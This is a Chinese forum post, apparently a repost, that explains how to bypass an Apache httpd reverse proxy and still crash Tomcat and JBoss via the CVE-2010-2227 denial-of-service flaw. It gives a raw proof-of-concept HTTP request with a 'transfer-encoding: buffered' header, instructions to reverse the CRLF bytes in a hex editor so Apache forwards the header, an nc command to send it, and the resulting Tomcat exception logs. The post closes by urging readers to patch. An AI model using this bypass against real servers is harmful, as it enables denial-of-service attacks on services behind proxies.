设为首页 收藏本站
查看: 1981|回复: 0

[经验分享] 绕过 Apache httpproxy 继续DOS TOMCAT/JBOSS

[复制链接]

尚未签到

发表于 2017-1-4 08:56:28 | 显示全部楼层 |阅读模式
  从长远的角度讲,一个完整的安全方案,应该是和现有架构本身的特性,是分开的,它并不能因为现有应用架构拦截了攻击,于是自己就表示影响不大。如果安全方案总是依靠应用现有的特性,那就要承受可能被绕过的隐患,这种隐患,导致我们总有一天,会不得不把补丁老老实实的打上去。如本文就是一个很好的例子。

  在上一篇文章《Tomcat远程拒绝服务漏洞分析(CVE-2010-2227)》中,笔者根据TOMCAT的补丁,分析出了攻击未修补版本的POC,相信不少人体验了一把。然而在实际使用中,只有小公司喜欢把tomcat放在最外面。大企业都喜欢在tomcat外面使用apache等webserver转发,以便获得更好的响应速度,或者为了分离静态文件,减轻服务器压力。

  对于这样的情况,你会发现使用笔者给的POC,这里是无效的,关于这一点,官方如下描述“This flaw is mitigated if Tomcat is behind a reverse proxy (such as Apache httpd 2.2) as the proxy should reject the invalid transfer encoding header.”他说如果你的tomcat外面还有一层web server做转发,就会减轻这个漏洞带来的危害。

  也许大家看到这个,放心了很多,就没有修补。

  官方这么讲,是什么原理呢?我们看下攻击的POC:

POST /CodePK/updateinfo HTTP/1.1 Host: localhost Keep-Alive: 300 Connection: keep-alive transfer-encoding: bufferedContent-Length: 145 u_uid=admin&u_pwd0=123456&u_pwd1=&u_pwd2=&u_email=rfes%40rfes.com&u_location=B2B&u_lang=1&u_web=22222222&u_quote=ffvd&u_submit=%E6%8F%90%E4%BA%A4
  遇到这样的HTTP头,apache会因为有”transfer-encoding: buffered”,则自动拦截下来,自己处理掉这个数据包,不交给tomcat处理,并直接返回错误。这是出于apache自己的原因造成的,但是这不重要。重要的是,这个拦截的机制,能否被绕过。TOMCAT仍然老老实实的在apache后面等候数据包,如果能绕过,它就会再次忠实的睡大觉。要绕过apache的“自动拦截”(这个名字好记点),就必须让apache不认识这个头。

  发个数据包,这是拦截后返回的信息:

A:\tools>nc-vv localhost 80 < aa.txtDNS fwd/rev mismatch: kxlzx != localhostbillgates [127.0.0.1] 80 (http) openHTTP/1.1 500 Internal Server Error……..省略<p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p>…….省略

  Apache返回了500 Internal Server Error,如果去掉那个头”transfer-encoding: buffered”,返回就200 OK了,但是也就打不死了。



  看起来这是个死循环,永远搞不定,所以tomcat官方也说了能减轻危害。

  但是,如果apache和tomcat对某些字符的理解不一致,可能会apache放过某些字符,但是tomcat却刚巧认识,又如果这个字符刚好能影响到这里,就会bypass这个所谓的“防御架构”,所以我们找找看有没有这样“猥琐”的字符存在。

  Apache和Tomcat实现原理不一样(废话),所以,对一些字符可能理解不一致,是正常的。



  我们先看看大家对http heads的分段是如何理解的,我查到“CRLF”,从apache源码中看到,它把crlf定义为“\r\n”,转换为也就是16进制的“0D 0A”(为什么提16进制等下讲),这个供参考:https://svn.apache.org/repos/asf/httpd/flood/trunk/flood_test.c
  
  其实我不熟悉C,也不知道这段主要是做什么的,但是看到它的确定义了

  “#define CRLF "\r\n"”,只有这一个对crlf的定义。

  这有什么用呢?这其实表示,apache所理解CRLF,就是“\r\n”,它不认识“\n\r”(看仔细点,反过来了)。

  悲剧的是,tomcat和JBOSS认识它们,并且很喜欢它们!

  Tomcat和jboss对这个东西的定义含义是

  “If (xx=="\r"|| xx=="\n")”

  就是说,不但把字符反过来写它们认识,就算拆成骨头,TOMCAT和JBOSS也认识。

  知道了这个关键点,下面思路就有了。我们把”transfer-encoding: buffered”这个字段,伪装成其他字段的一部分,让apache放过去,交给tomcat处理就可以了。

  POC:

  于是我使用16进制编辑器,UltraEdit打开我复制出来的数据包文件aa.txt

  找到

  transfer-encoding: buffered

  把这一行之前的字符

  注意括起来的两个地方,把它们顺序分别颠倒一下,两个地方的“0D 0A”都改为“0A 0D”。改后如下:

  原来包是这样的:

Connection: keep-alive 这是字段1 transfer-encoding: buffered 这是字段2Content-Length: 145 这是字段3
  三个字段其实属于同一个字符串,他们的间隔本来是“\r\n”,我们改为“\n\r”。一旦这个包发给apache后,apache认为只有一个字段”Connection”过来了,接着就把这个字段原封不动的交给tomcat。

  可怜的tomcat看到这个包,却认为它是三个字段,解开了这个包,所以,砰。。。挂了

  现在把我改后的文件,使用nc提交上去:

A:\tools>nc -vv localhost 80 < aa.txt DNS fwd/rev mismatch: kxlzx!= localhost billgates [127.0.0.1] 80 (http) open HTTP/1.1 404 Not Found Date: Sat, 24 Jul 2010 01:48:34 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Length: 1006 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive <html><head><title>Apache Tomcat/5.5.29 - Error r font-size:22px;} H2 {font-family:Tahoma,Arial,san ;color:white;background-color:#525D76;font-size:1 ahoma,Arial,sans-serif;color:white;background-col olor : black;}A.name {color : black;}HR {color : noshade"><p><b>type</b>Status report</p><p><b>me einfo) is not available.</u></p><HR size="1" nosh
  当有信息返回时,再看看tomcat的控制台,已经一大堆异常了,测试apache后面的JBOSS也是一样,统统挂掉。

2010-7-249:48:34 org.apache.coyote.http11.Http11AprProcessor process严重: Error finishing requestjava.lang.NullPointerExceptionat org.apache.coyote.http11.filters.BufferedInputFilter.doRead(BnputFilter.java:90)atorg.apache.coyote.http11.filters.IdentityInputFilter.end(IdentFilter.java:161)atorg.apache.coyote.http11.InternalAprInputBuffer.endRequest(InrInputBuffer.java:378)atorg.apache.coyote.http11.Http11AprProcessor.process(Http11Aprr.java:862)atorg.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHaocess(Http11AprProtocol.java:640)atorg.apache.tomcat.util.net.AprEndpoint$Worker.run(AprEndpoint87)at java.lang.Thread.run(Thread.java:619)2010-7-24 9:48:34 org.apache.coyote.http11.Http11AprProtocol$Http11Connedler process严重: Error reading request, ignoredjava.lang.NullPointerExceptionat org.apache.coyote.http11.filters.BufferedInputFilter.recycle(InputFilter.java:105)atorg.apache.coyote.http11.InternalAprInputBuffer.nextRequest(IprInputBuffer.java:356)atorg.apache.coyote.http11.Http11AprProcessor.process(Http11Apr

  
  所以,大家躲在apache的http proxy后面的tomcat和JBOSS,就不要抱着侥幸心理了,速度修补吧!

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-323549-1-1.html 上篇帖子: apache httpd-vhosts.conf文件配置 下篇帖子: Apache 被黑了,有邮件为证!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表